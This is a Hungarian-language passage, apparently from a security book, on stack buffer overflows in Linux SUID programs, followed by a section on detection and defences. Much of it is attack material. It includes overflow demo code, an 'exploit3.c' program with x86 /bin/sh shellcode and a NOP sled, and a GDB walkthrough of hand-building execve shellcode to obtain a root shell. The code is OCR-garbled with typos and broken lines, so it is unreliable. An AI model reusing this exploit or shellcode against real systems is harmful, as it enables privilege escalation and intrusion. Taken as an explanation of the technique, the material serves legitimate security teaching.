Ezzel át lehet venni az ellenőrzést a számítógép felett. Azonban bizonyos bevitelekkel még végre lehet hajtatni egy kódot az instabil rendszeren. hiszen rootként futó eljárások csak olyanok lehetnek. és egy hosszú karakterláncot küld egy meghatározott programnak. hogy a program a tulajdonos és nem a felhasználó jogaival fut. és .adatmennyiség kilóg a pufferből egy olyan területre. Talán felmerül a kérdés. root-jogokat követel meg. Eközben az adatok mindent felülírnak.1 Hogyan lehet ezt kihasználni? Ha a támadó Buffer-Overflow-val akar lefagyasztani egy programot. hogy egy shellt (parancssort) nyissanak root-jogokkal a rendszeren. és végül a program hibás működését. hogy addig ír a pufferba. Ha minden felhasználó root-jogokkal tud programokat futtatni. } 11. OverFlow (To Great) } //Most jön a függvény. amit ott találnak. A ping egy jó példa az olyan programra. Ha a támadó kapcsolatot épít fel a hosttal. amíg az megtelik. mint a ToGreat változó. amikor a program egy eljárásból vagy függvényből visszatér. mint a raw sockets vagy bizonyos rendszererőforrások elérése. //ezért az utána elhelyezkedő terület felülíródik strcpy(ToLittle.2. végül rátesz még egy lapáttal. amely A-kkal tölti ki a memóriaterületet for(i = 0. GDB=GNU Debugger) futtatásához még Linux is kell.különben nem fog menni. i < 255. Világos. hogy egy shellt hozzon létre. például az 1024 alatti portoké vagy eszközöké. i++) { large_string[i] = 'A'. természetesen megnő a lehetséges hibaforrások száma. //egy ciklus. hogyan nem íródnak felül válogatás nélküli tetszőleges programrészek. amely a tulajdonképpeni hibát okozza void Overflow(char *string) { //A puffer kisebb. s hogyan lehet célzottan megváltoztatni a függvény visszatérési pontjának a címét. hogy egy ilyen program biztonsági kockázatot jelenthet. Forráskódokkal mutatjuk meg. hanem más változókhoz tartozik. ami azt jelenti. úgynevezett kizsákmányoló (exploit) kód van. Ez természetesen hibákat eredményez. hogy miért kell egyáltalán root-jogokkal futniuk a programoknak. ami root-jogokkal fut. hogy egy Buffer-Overflow segítségével „megörököljenek" egy root-jogokkal rendelkező shellt. amit átadtak charTolittle[16] //megpróbálja 256 bájttal teleírni a puffért. holott csak 16 bájtra volna lehetőség. string). amely már nem ehhez a pufferhez. A kivitelezéshez szükséges programok (GCC=GNU C Compiler. Ennek a következő a háttere: egyes funkciók. A biztos eredmény: memóriavédelmi hiba és a program összeomlása. de minden felhasználó elindíthatja. akkor csak annyit kell tennie. . A továbbiak megértéséhez alapos assembler. a tulajdonképpeni Buffer-Overflow-t. csak hogy megszerezzék a nekik szükséges helyet. Itt a támadók különösen abban érdekeltek. A shell-kód értelme és célja. 11. Egy példa az ilyen kódra: voidman( ) { //a ToGreat változót 256 bájttal inicializálja char ToGreat[256] //ciklusváltozó int i. Sok. Ez főleg a SUID-programoknál érdekes. amelyek a roothoz tartoznak. Ez egy SUID bitet helyez el.és Shellscript-ismeretekre van szükség . amely arra kényszeríti a programot. amelyek már bootoláskor elindulnak.2.2 Hogyan működik? Shell-kód alatt olyan assembler-kódot értünk. amelyek arra valók. az lefagy. hogy ez fusson a főprogram helyett.

A változókhoz értéket rendel if (argc > 1) bsize = atoi(argv[1]). if (!(buff=malloc(bsize))) { printf("Can't allocate memory. A NOP-kódokat a pufferméret feléig írjuk a memóriába. . Beírjuk a shellkódokat a memóriába. hogy a kód. bsize=DEFAULT_BUFFER_SIZE. system("/bin/bash "). azáltal.(strlen(shellcode)/2)). Egy valódi exploitnál ez többnyire több mint 100 . *ptr. mint a „DEFAULT_OFFSET". mert még nem ismerjük a shellkód helyét a memóriában. Fontos még megemlíteni.1000 NOP kód. Pointer a ptr címére for (i = 0. A Shellcode változóhoz egy értéket rendelünk. cbar shettcode[ ] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\ x40\xcd" "\x80\xe8\xdc\xff\xff\xff\bin/sh".4). Természetesen a támadók több NOP-kódot is beépítenek. addr).offset. ptr = buff. Ez a kód még nincs kész. Pointer az „addr-ptr" helyére. mert az addr-ptr címét minden cikluslefutással növeljük. Most elhelyezzük az endbyte-ot. int i. int offset=DEFAULT_OFFSET. a többi assembler. buff[bsize -1]= '\0'. hogy a NOP-kód csak a Ox90-es Intel CPU-kon fut.Magyarázatképpen egy forráskód: exploit3. } Olyan fogalmakkal lehet dolgozni. i+=4) *(addr_ptr++) = addr. Az „Offset" értéke 0 0 512 0x90 printf("Using address: 0x%x\n". i < bsize/2. putenv(buff). i++) *(ptr++) = shellcode[i]. addr. hogy növeljék a találat esélyeit. unsigned long get_sp(void) { asm("movl%esp.%eax"). exit(0). i < strlen(shellcode). } memcpy(buff. i++) buff[i] = NOP. if (argc > 2) offset = atoi(argv[2])."EGG=". } A „get_sp" változó feltöltése assembler-kóddal} mid main(int argc.c #include #define DEFAULT_OFFSET #DEFAULT_BUFFER_SIZE #defineNOP addr = get_sp( ) . A „ptr" megfelel a „bufF"-nak addr_ptr = (long *) ptr. dhar *argv[ ]) { char *buff. i < bsize. for(i = 0. olvashatóbbá váljon. ptr = buff+ ((bsize/2) . hogy eltaláljuk a megfelelőt. for (i = 0. hogy kevesebb számot használunk. \n"). a Shellcode csak a „bin/sh". Kiírja a „Using address: 0x%x\n" -t és az „addr" értékét. a pointer minden alkalommal egy bájttal tovább mutat. Ezért nagyon pontosan meg kell becsülni. long *addr:ptr.

és GDB-vel elemezzük. execve(name[0]. amely szabad helyet készít a helyi változóknak.%eax 0x8000149: pushl %eax 0x800014a: movl 0xfffffff8(%ebp).%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp). %ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb.2. name. NLL).c #include void main( ) { char *name[2].%ebp $0x8. először a „main"-t analizáljuk: 0x8000130: 0x8000131: 0x8000133: pushl movl subl %ebp %esp.%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp).%eax 0x800014d: pushl %eax 0x800014e: call 0x8002bc <__execve> 0x8000153: addl $0xc.3 Minek kell a Shellcode változónál állnia? Most már mindenképpen segítségül kell hívni egy GDB-t! shellcode. Ehhez először a GCC-vel kell compilerelni a programot.%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <_execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x80001a34<__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+l>: movl %esp.%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp. A régi frame-pointert mentjük.%esp Ez volt az eljárás kezdete.11.c Most elindítjuk a GDB-t: gdb shellcode A GDB ingyenes szoftver. name[0] = "/bin/sh". elindítjuk.(%eax) 0x80002e1 <__execve+37>: movl $0xfffffffc. %esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop End of assembler dump. hogyan néz ki a forráskód assemblerben.%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp). és másolatot is lehet róla készíteni! (gdb) disassemble main Dump of assembler code for function main: 0x8000130: pushl %ebp 0x8000131: movl %esp. Ebben az esetben: .0xfffffffc(%ebp) 0x8000144: pushl $0x0 0x8000146 leal 0xfffffff8(%ebp).%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax. } Hogy megnézzük. name[1] = NULL.%esp 0x8000156: movl %ebp. Hogy ezt megértsük. A parancs így néz ki: gcc -o shellcode -ggdb -static shellcode.%edx 0x80002d2 <__execve+22>: movl %edx.0xfffffff(%ebp) 0x800013d: movl $0x0.%ebp 0x8000133: subl $0x8.%esp 0x8000158: popl %ebp 0x8000159: ret End of assembler dump. és egy új frame-pointert állítunk elő.%esp 0x8000136: movl $0x80027b8.

0x8000144: pushl $0x0 Az execve( ) argumentumait fordított sorrendben helyezzük (push) a stackbe. %eax 0x8002bc <__execve> Beírjuk a stackbe a "/bin/sh" sztring címét.c gdb exit (no debugging symbols found).%eax Beírjuk a name[ ] címét a stackbe.. Kernel módra váltunk. Beírja az instruction pointert a stackbe. %ebp pushl %ebx . } gcc -o exit -static exit. A "/bin/sh" címét bemásoljuk az EBX-be. amelyek azután más értékeket tartalmazhatnának. A Null pointer címét az EDX-be másoljuk.%eax Betöltjük a name[ ] címét az EAX regiszterbe. Ezt úgy tudja elérni. 0x8000146: leal 0xfffffff8(%ebp). A támadó egy ilyen programot természetesen megpróbál tisztán programozni. Ez az index a syscall-táblában. movl Betöltjük a "/bin/sh" sztring címét az EAX regiszterbe.c #include void main( ) { exit(0). Most execve( ). 0x80002bc <__execve>: 0x80002bd <__execve+1>: movl 0x80002bf <__execve+3>: pushl %ebp %esp. 11 az execve. 0x8000149: 0x800014a: 0x800014d: 0x800014e: pushl call pushl %eax 0xfffffff8(%ebp). ha félresikerül? A program végeérhetetlenül tovább hozná az értékeket a stackből.0xfffffffc(%ebp) A 0x0 (NULL) értéket a második pointer of name[ ] -be másoljuk. A name [ ] címét bemásoljuk az ECX-be. 0x8000136: Az eljárás kezdete movl $0x80027b8. De mi történik. Minden folyamat az operációs rendszertől függ.%ebx 0xc(%ebp). Az execve( ) meghívása itt kezdődik.char *name[2].%eax 0x8(%ebp).%edx $0x80 A 0xb-t a stackbe másoljuk.0xfffffff(%ebp) 0x80002c0 <__execve+4>: movl 0x80002c5 <__execve+9>: movl 0x80002c8 <__execve+12>: movl 0x80002cb <__execve+15>: movl 0x80002ce <__execve+18>: int $0xb./bin/sh" címe) bemásoljuk az első pointer of name[ ] -be. Ez ugyanazt jelenti mint: name[0]="/bin/sh".%ebp A 0x80027b8 értéket (a . Az execve( ) library eljárás meghívása. Ez ugyanazt jelenti mint: name[1] = NULL. Nem valami finom dolog. NULL-ával kezdünk. (gdb) disassemble_exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp. hogy hozzáfűz egy exit syscall-t: exit.%ecx 0x10(%ebp).. Tulajdonképpen ez minden az execve( ) meghívásáról. 0x800013d: movl $0x0.

Összefűzve ez a következőképpen néz ki: Elhelyezzük a sztringet a kód mögött. %ecx leal null-offiet(%esi). %ebx int $0x80 /bin/sh string goes here. %esp popl %ebp ret nop nop nop szünk. %ebx leal string_addr.null-offset(%esi) movl $0xb. A J itt a Jump.%eax movl 0x8(%ebp).string_addr_addr movb $0x0. hogy pontosan hova kerül a memóriában az exploit kódunk. Most már csak annyit kell tenni. a sztringcím lesz visszatérési címként megadva.array-offset(%esi) # movb $0x0. %ebx int $0x80 call offset-to-popl /bin/sh string goes here. könnyítésképpen bizonyos parancsokat lehet használni. és a Call parancshoz egy Jump parancsot. (%esi). természetesen a sztring címét és az endbyte nullát a tömb mögé tesszük.0x800034f <_exit+3>: 0x8000350 <_exit+4>: 0x8000355 <_exit+9>: 0x8000358 <_exit+12>: 0x800035a <_exit+14>: 0x800035d <_exit+ll>: 0x800035f <_exit+19>: 0x8000360 <_exit+20>: 0x8000361 <_exit+21>: 0x8000362 <_exit+22>: 0x8000363 <_exit+23>: End of assembler dump. mikor a hívás lefutott.%ecx leal null_string.%eax movl %esi. movl %esÍ.null_byte_addr movl $0x0.null_addr movl $0xb.%edx int $0x80 movl $0x1. %eax movl $0x0. pushl %ebx movl $01. Ha a „/bin/sh" sztring elé egy Call parancsot teA programkód a módosításokat követően jmp offset-to-call popl %esi .%ebx int $0+80 movl 0xfffffffc(%ebp). hogy a visszatérési címet bemásoljuk a regiszterbe. %ebx leal array-offset. Jump-pal és Call-lal olyan parancsokat lehet használni. %eax movl string_addr. %edx int $0x80 movl $0x1.%ebx movl %ebp. és ezután kell végrehajtani az „int 0x80"-at. movl string_addr. %eax movl $0x0. ez az exit kód. és a C a Call helyett áll. ha nem volt hiba. Mivel soha nem tudjuk pontosan. A legtöbb program 0-t ad vissza. amelyekkel relatív címeket kapunk. # 2 bytes # 1 byte 3 bytes # 4 bytes # 7 bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes .nullbyteoffset(%esi) movl $0x0. A programfutás a következőképpen néz ki: Az Exit syscall-t a 0xl-re helyezzük az EAX-ben.

a gets( ). logikus. Ez persze véd a Stack Overflow-któl. egy kis példa: void tulcsordul(char argvFG) { char BuffertoLittle [4]. a sztringcímről tömbre és a sztringcímet nullára számoljuk át. működik-e a kód. Az ilyen funkciókat a forráskódban a legegyszerűbb megkeresni. amelyhez a vége után is hozzá tudunk írni. Ha olyan programról van szó. amelyet futtatunk. mint a Stack Overflow-kat. Lényegében a dinamikus hozzárendelés sem sokkal biztonságosabb. ezzel minden veszélytől védve vannak.Ha az offseteket Jump-ról Call-ra. a vprintf( ). A parancsok egyszerűen egy null-karakterig (\0) olvasnak. hogy soha nem statikus puffereket. először a compilerrel lefordítjuk. Ilyenkor többnyire a sztringhosszúságot figyeljük az átadási pontokon. 11. neki elég néhány könyvtárfunkciót használnia.0x7 (%esi) movl $0x0.%edx int $0x80 movl $0x1. amelynek megvan a forráskódja. ezt kapjuk: jmp 0x26 popl %esi jnovl %esi. egy null-terminálással megjelölt program végéig.0x8(%esi) movb $0x0. A másik eljárás arra. ami természetesen egy fatális programozási hiba. és máris jelentkeznek ezek a problémák. Először azonban a bináris kód hexmegjelenítéséhez kell jutnunk. és hibákat keresünk. akkor lehet mindent compilerelni. Mik azok a Heap-based Overflow-k? Heap-based Overflow-kat sokkal nehezebb előállítani. Hogy ezt elérjük. de nem a Heap-based Overflow-któl. és ezután a transzferkontrollt kell használni. hogy túl lehet tölteni a puffért. ami pl. akkor nincs gond. %ebx int $0x80 call 0x2b string \"/bin/sh\" # 2 bytes # l byte # 3 bytes # 4 bytes # l bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes #8 bytes álló puffer. 11. De van egy probléma! Ez a kód sajátosan változik. a strcat( ).%ecx leal 0xc(%esi). egy ciklus. A programozók úgy gondolják. mekkora a rendelkezésre . %eax movl $0x0.4 Honnan lehet felismerni a Buffer-Overflow-t? Szerencsére sok lehetőség van a Buffer-Overflow-k felismerésére. Ezért a kódot. hogy egy puffért bevitelekkel megtöltsünk. és azután teszteljük. A hiba azonban többnyire nem a programozón múlik. %ebx leal 0x8(%esi). A könyvtárfüggvények tartalmazta parancsok. ezért ritkábban is találkozni az előbbiekkel. amely elolvas és a pufferbe ír egyes karaktereket. Call-ról Popl-ra. A sztring azonban lehet túl hosszú. és a \0 jóval a puffer vége után is elhelyezkedhet. hanem helyette malloc( ) -ot használnak. a kódot egy globális tömbbe helyezzük a fájlszegmensben. Ha egy bevitel ellenőrzés nélkül. s a programozók sem nagyon védik ettől a programjaikat. Ha ez kész. a user interfészen keresztül lehet váratlan bevitelekkel tesztelni a programot. hogy mi áll hozzá a rendelkezésünkre. Ha nincs ilyen lehetőség (nincs meg a forráskód). Hozzáértő hackereknek tehát ez egy egészen különleges támadási pont! A gond az. Itt szisztematikusan ellenőrizni kell a paraméter-átadásokat és az egyes funkciókat (a DLL-eket és a library-ket). és ismét a GDB-t használni. Linuxprogramoknál szabadon hozzáférhető.%eax movl %esi. ami attól függ.3 Áldozat a Buffer-Overflow-kért Ezekhez a támadásokhoz tehát egy pufferra van szükség. a strcpy( ) és a scanf( ) nem figyelnek arra. közvetlenül a Strcpy-val kerül használatba. Sok operációs rendszer ezt megint csak nem engedi meg.0xc(%esi) movl $0xb. Hogy kiderüljön. íme. egy fájlszegmensbe vagy stackbe kell csomagolni. a sprintf( ). az ismert bizonytalansági faktorokra.

illetve védhetnek bizonyos mértékig e támadások ellen. akkor a Netcattel egyenként lehet ellenőrizni a parancsokat a Buffer-Overflow-ra. a „root"-ot lehet egyszerűen így nevezni: „HAHA". argv). hajtsd végre\n". honnan jönnek az adatok. A Solaris 2. A felderítés egyik lehetősége lenne a szerver lekapcsolása. pl. A névadási kényszer miatt ez a variáció szinte mindig sikeres. és részletről részletre átvizsgálni. } /* Helyes: ahogy a felső részben. Itt nem a forráskód a fontos. és a következőképpen elindítani: „Név 052698541". Megmutatja. Ezt indítja el az exploiton keresztül is. bevitelekkel tesztelni a Buffer-Overflow lehetőségeket. ha egyszer már megleptek. és egy speciális compilerrel minden programot újra kell fordítani. Ezért érvényes a régi szabály: „Minél jobban eltérsz a szabványosított megnevezésektől.6+ védenek. hogy a shellneveket és az /etc/passwd-fájlt megfelelően megváltoztassuk." A demonstráláshoz egyszerűen le kellene fordítani ezt a programot. disassemblálni. a SecureLINUX és a Solaris 2. A hacker célja mindig az. strcpy(BuffertoLittle. hogyan lehet paraméterekkel és más átadásokkal (ezek más helyeken is történhetnek) szándékosan lefagyasztani programokat. hogy az összedöntí a programot. annál nehezebb lesz a támadás. és az egész Linuxot kompletten át lehet írni. hanem egy manuálisan előidézett BufferOverflow demonstrálása. mert a beírás hosszabb volt. De felhasználóként vagy rendszergazdaként megvan még az a lehetőségünk is. vagy váratlan karakterekkel feltölteni. először ellenőrizni. ha minden program forráskódja megvan. mint azt a programozó várta. amelynél a parancsokat és a szintaxist is meg lehet tudni. hogy a „heap"-ben és a „stack"-ben programok futhassanak (noexec_user_stack. } eke { cout « "Bevitel OK. itt is szándékosan túl hosszú beviteleket kell csinálni. vagyis manuálisan. Egy programot lehet pl. Így már a hálózat felügyeletével is fel lehet ismerni.5 Milyen védelmi mechanizmusok vannak? Tulajdonképpen csak egy Linux-verzió. /*Rossz: Ha argc[ ] túl nagy.if (strlen(argv) > 7) { cout« "Rossz: a puffer túl fog csordulni\n". Ez akkor segíthet. A SecureLINUX-nál egy patch-re van szükség ehhez. tulcsordul(argv[1]). . hogy egy rootshell-hez jusson egy másik Linux-gépen. és utána végrehajtani vagy */ /* mindjárt biztonságos függvényeket használni */ Természetesen más módszerek is vannak. „PZK" túlfut */ } int main(int argc. ami megakadályozza. Ha ez megtörténik. } 11. Ha egy kifelé nyitott hálózati szolgáltatóról van szó. ha a felhasználói privilégiumokat nem használják ki túlságosan. mielőtt a hacker törölhetné a nyomait a logfájlokból. A standard kernelt kell megváltoztatni. strcpy(BuffertoLittel. Honnan ismerünk fel egy Buffer-Overflow-támadást? A Buffer-Overflow-támadásokat nagyon nehéz felfedezni. a támadó többé nem tud mit kezdeni ezzel a számítógéppel. és a reakcióra várni. nincsenek veszélyben. Így a fenti példa szerinti Buffer-Overflow természetesen nem sikerülhet. Ahogy az előbbiekben. argv). noexec_user_heap). Ezáltal a Solarissal kapott programok. Különösen.6+ nál a „normál" telepítés után aktiválni lehet egy kapcsolót. char *argv[ ]) { cout« "Az átadandó paraméter hossza:" « strlen (argvF1G) « "\n". úgy kell ezt */ /* csinálni. Itt az átadandó paraméternek olyan a hossza.

1 Összefüggés a CPU és a Buffer-Overflow között Manapság sok szervert működtetnek a kereskedelemben nem szokásos CPU-kkal. nem fognak bennük kiindulási pontot találni Buffer-Overflow-khoz.2 A Buffer-Overflow-k és a tűzfalak Egy tűzfallal természetesen csökkenteni lehet a Buffer-Overfíowtámadások lehetőségét. illetve a belső interfészek megtámadását. Ezáltal a támadót vissza lehet fordítani az assembler-kód irányába. Konfliktusok abból adódhatnak. HTTP-szerver vagy adatbázis szerverként működik. pl. 11. . A tűzfal megnehezíti a külső. hogy egy készre fordított exploit jelenik meg az interneten.5.5. Mivel a tűzfalak szinte mindig viszonylag kicsik. router.11. ha a szervernek még más feladatokat is el kell látnia. Ezek nagy biztonsági kockázatot jelentenek. Így a tapasztalatlan támadóknak aligha van esélyük. Teljes biztonságban azonban sohasem érezhetjük magunkat. és csökken annak a kockázata. e-mail gateway. proxy.

Sign up to vote on this title
UsefulNot useful